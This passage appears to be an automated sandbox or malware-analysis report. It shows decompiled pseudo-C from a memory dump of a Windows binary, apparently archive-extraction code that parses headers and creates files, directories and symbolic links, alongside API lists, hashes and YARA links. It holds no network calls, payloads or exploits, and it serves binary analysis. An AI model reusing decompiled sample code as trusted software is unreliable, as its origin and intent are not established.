0x00197286
0x00197288
0x00197324
0x00197335
0x00197339
0x0019733c
0x00197342
0x00197356
0x00197369
0x0019737c
0x00197387
0x00197392
0x00197397
0x0019739e
0x001973a4
0x001973a4
0x001973af
0x00000000
0x001973af
0x00197292
0x0019729d
0x001972a2
0x001972ab
0x001972bb
0x001972c2
0x001972ca
0x001972ca
0x001972bb
0x001972d6
0x001972df
0x001972eb
0x001972ec
0x00197316
0x001972ee
0x001972ee
0x001972ee
0x00000000
0x001972ec
0x001971ca
0x001971cc
0x00000000
0x00000000
0x00000000
0x001971cc
0x0019715f
0x00197162
0x0019716a
0x00197170
0x00197173
0x0019717e
0x00197184
0x00197192
0x00197197
0x0019719a
0x0019719d
0x001971a6
0x001971bb
0x00000000
0x001971c0
0x0019710f
0x001970ca
0x00000000
0x00000000
0x001970d7
0x001970dc
0x001970de
0x00000000
0x00000000
0x001970ea
0x001970eb
0x001970ef
0x001970f0
0x001970f8
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00196FCB
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 0019712B
CloseHandle.KERNEL32(00000000), ref: 0019713B

Part of subcall function 00197A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00197A24
Part of subcall function 00197A15: GetLastError.KERNEL32 ref: 00197A6A
Part of subcall function 00197A15: CloseHandle.KERNEL32(?), ref: 00197A79

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00197146
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00197254
DeviceIoControl.KERNEL32 ref: 00197280
CloseHandle.KERNEL32(?), ref: 00197292
GetLastError.KERNEL32(00000015,00000000,?), ref: 001972A2
RemoveDirectoryW.KERNEL32(?), ref: 001972EE
DeleteFileW.KERNEL32(?), ref: 00197316

Strings

UNC\, xrefs: 00197076
\??\, xrefs: 00197051
SeCreateSymbolicLinkPrivilege, xrefs: 00196FF6
SeRestorePrivilege, xrefs: 00196FEC

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 0feac91ea333a4b95eab21573cdd9456df1d4f6a8952457c39b7b633830726a7
Instruction ID: e86438485fb4cc65ba3d916fc948fd962e7b18422316a6175b1237eb20dcb519
Opcode Fuzzy Hash: 0feac91ea333a4b95eab21573cdd9456df1d4f6a8952457c39b7b633830726a7
Instruction Fuzzy Hash: B8B1D071914218ABEF21DFA4DC41FEE77B8AF19300F1444AAF919E7182D770AA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001930FC, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 605
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E001930FC(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t378;
				void* _t380;
				void* _t381;
				void* _t392;
				intOrPtr* _t394;
				intOrPtr* _t396;
				signed int _t409;
				signed int _t419;
				char _t431;
				signed int _t432;
				signed int _t437;
				signed int _t441;
				intOrPtr _t449;
				unsigned int _t455;
				unsigned int _t458;
				signed int _t462;
				signed int _t470;
				signed int _t479;
				signed int _t484;
				signed int _t498;
				intOrPtr _t499;
				signed int _t500;
				signed char _t501;
				unsigned int _t502;
				void* _t509;
				void* _t517;
				signed int _t520;
				void* _t521;
				signed int _t531;
				unsigned int _t534;
				void* _t539;
				intOrPtr _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				intOrPtr _t556;

				_t396 = __ecx;
				_t546 = _t545 - 0x68;
				E001AD870(E001C11A9, _t544);
				E001AD940();
				_t394 = _t396;
				E0019C223(_t544 + 0x30, _t394);
				 *(_t544 + 0x60) = 0;
				 *((intOrPtr*)(_t544 - 4)) = 0;
				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t544 + 0x6a)) = 0;
					L16:
					if(E0019C42E(_t498, 7) >= 7) {
						 *(_t394 + 0x21f4) = 0;
						_t509 = _t394 + 0x21e4;
						 *_t509 = E0019C29E(_t544 + 0x30);
						_t531 = E0019C40A(_t544 + 0x30, 4);
						_t242 = E0019C39E(_t498);
						__eflags = _t242 | _t498;
						if((_t242 | _t498) == 0) {
							L85:
							E00191EF8(_t394);
							L86:
							E0019159C(_t544 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
							return  *(_t544 + 0x60);
						}
						__eflags = _t531;
						if(_t531 == 0) {
							goto L85;
						}
						_t42 = _t531 - 3; // -3
						_t534 = _t531 + 4 + _t242;
						_t409 = _t42 + _t242;
						__eflags = _t409;
						 *(_t544 + 0x64) = _t534;
						if(_t409 < 0) {
							goto L85;
						}
						__eflags = _t534 - 7;
						if(_t534 < 7) {
							goto L85;
						}
						E0019C42E(_t498, _t409);
						__eflags =  *(_t544 + 0x48) - _t534;
						if( *(_t544 + 0x48) < _t534) {
							goto L17;
						}
						_t248 = E0019C37E(_t544 + 0x30);
						 *(_t394 + 0x21e8) = E0019C39E(_t498);
						_t250 = E0019C39E(_t498);
						 *(_t394 + 0x21ec) = _t250;
						__eflags =  *_t509 - _t248;
						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
						_t254 =  *(_t394 + 0x21e8);
						 *(_t394 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
						 *(_t544 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
							 *(_t544 + 0x58) = 0;
							 *(_t544 + 0x54) = 0;
							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
								_t536 = _t256;
								 *(_t544 + 0x64) = _t256;
								 *(_t544 + 0x5c) = _t256;
								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E0019C39E(_t498);
									_t536 = _t362;
									 *(_t544 + 0x64) = _t362;
									 *(_t544 + 0x5c) = _t498;
								}
								_t257 = E00191901(_t394,  *(_t394 + 0x21f0));
								_t499 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t394 + 0x6ca8)) = E00193CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
								_t500 =  *(_t394 + 0x21e8);
								__eflags = _t500 - 1;
								if(__eflags == 0) {
									E0019A96C(_t394 + 0x2208);
									_t419 = 5;
									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
									_t501 = E0019C39E(_t500);
									 *(_t394 + 0x6cb5) = _t501 & 1;
									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
									_t431 = 1;
									 *((char*)(_t394 + 0x6cba)) = 1;
									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t394 + 0x6cb8)) = 0;
									__eflags = _t501 & 0x00000002;
									if((_t501 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = E0019C39E(_t501);
										_t270 = 0;
										_t431 = 1;
									}
									__eflags =  *(_t394 + 0x6cb5);
									if( *(_t394 + 0x6cb5) == 0) {
										L81:
										_t431 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t394 + 0x6cb9)) = _t431;
											_t432 =  *(_t544 + 0x58);
											__eflags = _t432 |  *(_t544 + 0x54);
											if((_t432 |  *(_t544 + 0x54)) != 0) {
												E0019200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
											}
											L84:
											 *(_t544 + 0x60) =  *(_t544 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t500 - 3;
								if(_t500 <= 3) {
									__eflags = _t500 - 2;
									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
									 *(_t544 + 0x2c) = _t517;
									E0019A8D2(_t517, 0);
									_t437 = 5;
									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
									_t539 =  *(_t544 + 0x2c);
									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
									 *((char*)(_t539 + 0x10f9)) = 1;
									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
									 *(_t539 + 0x1094) = E0019C39E(_t500);
									 *(_t539 + 0x1060) = E0019C39E(_t500);
									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t539 + 0x1064) = _t500;
									 *(_t539 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t539 + 0x1060) = 0x7fffffff;
										 *(_t539 + 0x1064) = 0x7fffffff;
									}
									_t441 =  *(_t539 + 0x105c);
									_t520 =  *(_t539 + 0x1064);
									_t290 =  *(_t539 + 0x1058);
									_t502 =  *(_t539 + 0x1060);
									__eflags = _t441 - _t520;
									if(__eflags < 0) {
										L51:
										_t290 = _t502;
										_t441 = _t520;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t539 + 0x106c) = _t441;
											 *(_t539 + 0x1068) = _t290;
											_t291 = E0019C39E(_t502);
											__eflags =  *(_t539 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
												E001A0A25(_t539 + 0x1040, _t502, E0019C29E(_t544 + 0x30), 0);
											}
											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
											__eflags =  *(_t539 + 0x1094) & 0x00000004;
											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
												 *(_t539 + 0x1070) = 2;
												 *((intOrPtr*)(_t539 + 0x1074)) = E0019C29E(_t544 + 0x30);
											}
											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
											_t292 = E0019C39E(_t502);
											 *(_t544 + 0x64) = _t292;
											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t449 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
											__eflags = _t449 - 0x32;
											if(_t449 != 0x32) {
												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t539 + 0x18)) = E0019C39E(_t502);
											_t521 = E0019C39E(_t502);
											 *(_t539 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t539 + 0x18));
											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t539 + 0x10fc;
													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t539 + 0x10fc) = 1;
											}
											_t455 =  *(_t539 + 8);
											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
											__eflags =  *(_t544 + 0x60) - 2;
											_t458 =  *(_t544 + 0x64);
											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
											if( *(_t544 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t458 & 0x00000040;
												if((_t458 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t539 + 0x10f0)) = _t302;
												_t304 =  *(_t539 + 0x1094) & 1;
												 *(_t539 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t521 - 0x1fff;
												if(_t521 >= 0x1fff) {
													_t521 = 0x1fff;
												}
												E0019C300(_t544 + 0x30, _t544 - 0x2074, _t521);
												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
												_push(0x800);
												_t522 = _t539 + 0x28;
												_push(_t539 + 0x28);
												_push(_t544 - 0x2074);
												E001A1094();
												_t462 =  *(_t544 + 0x58);
												__eflags = _t462 |  *(_t544 + 0x54);
												if((_t462 |  *(_t544 + 0x54)) != 0) {
													E0019200C(_t394, _t544 + 0x30, _t462, _t539);
												}
												_t319 =  *(_t544 + 0x60);
												__eflags =  *(_t544 + 0x60) - 2;
												if( *(_t544 + 0x60) != 2) {
													L72:
													_t320 = E001B2B69(_t319, _t522, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t394 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00191F3D(_t394, _t539);
													_t319 =  *(_t544 + 0x60);
													__eflags =  *(_t544 + 0x60) - 2;
													if( *(_t544 + 0x60) == 2) {
														L74:
														__eflags =  *(_t544 + 0x6b);
														if(__eflags != 0) {
															E00196BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t502;
										if(_t290 > _t502) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t500 - 4;
								if(_t500 == 4) {
									_t470 = 5;
									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
									_t331 = E0019C39E(_t500);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t394 + 0x225c) = E0019C39E(_t500) & 0x00000001;
										_t335 = E0019C251(_t544 + 0x30) & 0x000000ff;
										 *(_t394 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E0019C300(_t544 + 0x30, _t394 + 0x2264, 0x10);
											__eflags =  *(_t394 + 0x225c);
											if( *(_t394 + 0x225c) != 0) {
												E0019C300(_t544 + 0x30, _t394 + 0x2274, 8);
												E0019C300(_t544 + 0x30, _t544 + 0x64, 4);
												E0019F524(_t544 - 0x74);
												E0019F56A(_t544 - 0x74, _t394 + 0x2274, 8);
												_push(_t544 + 8);
												E0019F435(_t544 - 0x74);
												_t350 = E001AF3CA(_t544 + 0x64, _t544 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t394 + 0x225c) = _t352;
											}
											 *((char*)(_t394 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t544);
										E00193E41();
										E00193DEC(_t394, _t394 + 0x1e, _t544);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t500 - 5;
								if(_t500 == 5) {
									_t479 = _t500;
									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
									 *(_t394 + 0x45ac) = E0019C39E(_t500) & 0x00000001;
									 *((short*)(_t394 + 0x45ae)) = 0;
									 *((char*)(_t394 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t484 = E0019C39E(_t498);
							 *(_t544 + 0x54) = _t498;
							_t256 = 0;
							 *(_t544 + 0x58) = _t484;
							__eflags = _t498;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t484 -  *(_t394 + 0x21f0);
							if(_t484 >=  *(_t394 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E00191EF8(_t394);
						 *((char*)(_t394 + 0x6cc4)) = 1;
						E00196E03(0x1d00e0, 3);
						__eflags =  *((char*)(_t544 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00196BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
							 *((char*)(_t394 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00193DAB(_t394, _t498);
					goto L86;
				}
				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
					goto L15;
				} else {
					_push(0x10);
					_push(_t544 + 0x18);
					 *((char*)(_t544 + 0x6a)) = 1;
					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t544 + 0x6b) = 1;
						L8:
						E00193C40(_t394);
						_t529 = _t394 + 0x2264;
						_t543 = _t394 + 0x1024;
						E0019607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
						if( *(_t394 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
							goto L16;
						} else {
							_t378 = _t394 + 0x2274;
							while(1) {
								_t380 = E001AF3CA(_t544 + 0x28, _t378, 8);
								_t546 = _t546 + 0xc;
								if(_t380 == 0) {
									goto L13;
								}
								_t563 =  *(_t544 + 0x6b);
								_t381 = _t394 + 0x1e;
								_push(_t381);
								_push(_t381);
								if( *(_t544 + 0x6b) != 0) {
									_push(6);
									E00196BF5(__eflags);
									 *((char*)(_t394 + 0x6cc5)) = 1;
									E00196E03(0x1d00e0, 0xb);
									goto L86;
								}
								_push(0x7d);
								E00196BF5(_t563);
								E0019E797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
								E00193C40(_t394);
								E0019607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
								_t378 = _t394 + 0x2274;
								if( *(_t394 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t392 = E001A0FBA();
					 *(_t544 + 0x6b) = 0;
					if(_t392 == 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x001930fc
0x001930fd
0x00193105
0x0019310f
0x00193116
0x0019311d
0x00193124
0x00193127
0x00193130
0x00193279
0x00193279
0x0019327c
0x00193289
0x0019329a
0x001932a1
0x001932b1
0x001932bb
0x001932bd
0x001932c4
0x001932c6
0x001938f6
0x001938f8
0x001938fd
0x00193900
0x0019390e
0x00193919
0x00193919
0x001932cc
0x001932ce
0x00000000
0x00000000
0x001932d4
0x001932da
0x001932dc
0x001932dc
0x001932de
0x001932e1
0x00000000
0x00000000
0x001932e7
0x001932ea
0x00000000
0x00000000
0x001932f4
0x001932f9
0x001932fc
0x00000000
0x00000000
0x00193301
0x00193313
0x00193319
0x0019331e
0x00193329
0x0019332b
0x00193334
0x0019333a
0x00193340
0x00193346
0x00193349
0x0019334c
0x0019334e
0x00193388
0x00193388
0x0019338a
0x00193391
0x00193394
0x00193397
0x001933c1
0x001933c1
0x001933c8
0x001933ca
0x001933cd
0x001933d0
0x001933d5
0x001933da
0x001933dc
0x001933df
0x001933df
0x001933ea
0x001933f7
0x00193406
0x0019340f
0x00193417
0x0019341e
0x00193424
0x00193426
0x00193837
0x00193846
0x00193847
0x00193851
0x0019385a
0x00193867
0x00193876
0x00193881
0x00193884
0x0019388a
0x00193890
0x00193892
0x00193898
0x0019389b
0x001938b2
0x0019389d
0x001938a5
0x001938ad
0x001938af
0x001938af
0x001938b8
0x001938bf
0x001938c9
0x001938c9
0x00000000
0x001938c1
0x001938c1
0x001938c7
0x001938cb
0x001938cb
0x001938d1
0x001938d6
0x001938d9
0x001938e9
0x001938e9
0x001938ee
0x001938f1
0x00000000
0x001938f1
0x00000000
0x001938c7
0x001938bf
0x0019342c
0x00000000
0x00000000
0x00193432
0x00193435
0x00193577
0x0019357f
0x0019358e
0x00193592
0x00193595
0x0019359c
0x001935a3
0x001935ae
0x001935b1
0x001935b7
0x001935c0
0x001935c7
0x001935d5
0x001935e0
0x001935ef
0x001935ef
0x001935f1
0x001935f7
0x001935fd
0x00193604
0x0019360a
0x0019360a
0x00193610
0x00193616
0x0019361c
0x00193622
0x00193628
0x0019362a
0x00193632
0x00193632
0x00193634
0x00000000
0x0019362c
0x0019362c
0x00193636
0x00193636
0x0019363f
0x00193645
0x0019364a
0x00193651
0x00193654
0x00193667
0x00193667
0x0019366c
0x00193673
0x0019367a
0x0019367f
0x0019368e
0x0019368e
0x00193694
0x0019369e
0x001936a5
0x001936ae
0x001936b6
0x001936b9
0x001936bc
0x001936bf
0x001936c1
0x001936c1
0x001936d3
0x001936e7
0x001936e9
0x001936f3
0x001936f8
0x001936fe
0x00193700
0x0019370a
0x0019370c
0x0019370e
0x0019370e
0x0019370e
0x0019370e
0x00193702
0x00193702
0x00193702
0x00193715
0x0019371f
0x00193731
0x00193737
0x0019373b
0x0019373e
0x00193744
0x0019374f
0x0019374f
0x0019374f
0x00000000
0x00193746
0x00193746
0x00193749
0x00000000
0x00000000
0x0019374b
0x00193751
0x00193751
0x0019375d
0x00193762
0x00193777
0x0019377d
0x0019378c
0x00193791
0x0019379c
0x0019379e
0x001937a0
0x001937a0
0x001937ad
0x001937b2
0x001937c0
0x001937c5
0x001937c8
0x001937c9
0x001937ca
0x001937cf
0x001937d4
0x001937d7
0x001937e1
0x001937e1
0x001937e6
0x001937e9
0x001937ec
0x001937fe
0x00193804
0x0019380b
0x0019380d
0x0019380f
0x0019380f
0x00000000
0x001937ee
0x001937f1
0x001937f6
0x001937f9
0x001937fc
0x00193816
0x00193816
0x0019381a
0x00193827
0x00193827
0x00000000
0x0019381a
0x00000000
0x001937fc
0x001937ec
0x00193744
0x0019362e
0x00193630
0x00000000
0x00000000
0x00000000
0x00193630
0x0019362a
0x0019343b
0x0019343e
0x0019347f
0x0019348c
0x00193491
0x00193496
0x00193498
0x001934cf
0x001934da
0x001934dd
0x001934e3
0x001934e6
0x001934fc
0x00193501
0x00193508
0x00193516
0x00193524
0x0019352d
0x00193539
0x00193541
0x00193546
0x00193555
0x0019355f
0x00193561
0x00193561
0x00193563
0x00193563
0x00193569
0x00000000
0x00193569
0x001934e8
0x001934e9
0x001934a0
0x001934a3
0x001934a5
0x001934a6
0x001934b8
0x00000000
0x001934b8
0x0019349a
0x0019349b
0x00000000
0x0019349b
0x00193440
0x00193443
0x0019344a
0x00193457
0x00193463
0x0019346b
0x00193472
0x00193472
0x00000000
0x00193443
0x001933a1
0x001933a3
0x001933a6
0x001933a8
0x001933ab
0x001933ad
0x00000000
0x00000000
0x001933af
0x00000000
0x00000000
0x001933b5
0x001933bb
0x00000000
0x00000000
0x00000000
0x001933bb
0x00193352
0x0019335e
0x00193365
0x0019336a
0x0019336e
0x00000000
0x00193370
0x00193377
0x0019337c
0x00000000
0x0019337c
0x0019336e
0x0019328b
0x0019328d
0x00000000
0x0019328d
0x0019313e
0x00193141
0x00193143
0x00193149
0x00000000
0x0019315d
0x00193162
0x00193164
0x00193167
0x00193171
0x00000000
0x00000000
0x00193184
0x00193193
0x00193193
0x00193197
0x00193199
0x001931b5
0x001931c1
0x001931cd
0x001931d9
0x00193255
0x00193255
0x00000000
0x001931db
0x001931db
0x001931e1
0x001931e8
0x001931ed
0x001931f2
0x00000000
0x00000000
0x001931f4
0x001931f8
0x001931fb
0x001931fc
0x001931fd
0x0019325a
0x0019325c
0x00193268
0x0019326f
0x00000000
0x0019326f
0x001931ff
0x00193201
0x00193212
0x00193219
0x00193241
0x0019324d
0x00193253
0x00000000
0x00000000
0x00000000
0x00193253
0x00000000
0x001931e1
0x001931d9
0x00193186
0x0019318b
0x00193191
0x00000000
0x00000000
0x00000000
0x00193191

APIs

__EH_prolog.LIBCMT ref: 00193105
_memcmp.LIBVCRUNTIME ref: 001931E8

Strings

hc%u, xrefs: 001934E9
h%u, xrefs: 0019349B
CMT, xrefs: 001937FE

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: d039d4f4a95c9a1cdd3dd5c8eafcc407a7bce50e53cb85b4af7aa4eff2c3d283
Instruction ID: 0877549baba04c1817a79c2ffc7b27b35418afdcaa3d17b04fd4f04a4c99acc1
Opcode Fuzzy Hash: d039d4f4a95c9a1cdd3dd5c8eafcc407a7bce50e53cb85b4af7aa4eff2c3d283
Instruction Fuzzy Hash: 7E32C2715143849FDF18DF74C896AEA37A5AF25300F04457EFD9ACB286DB30AA49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001BC55E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E001BC55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
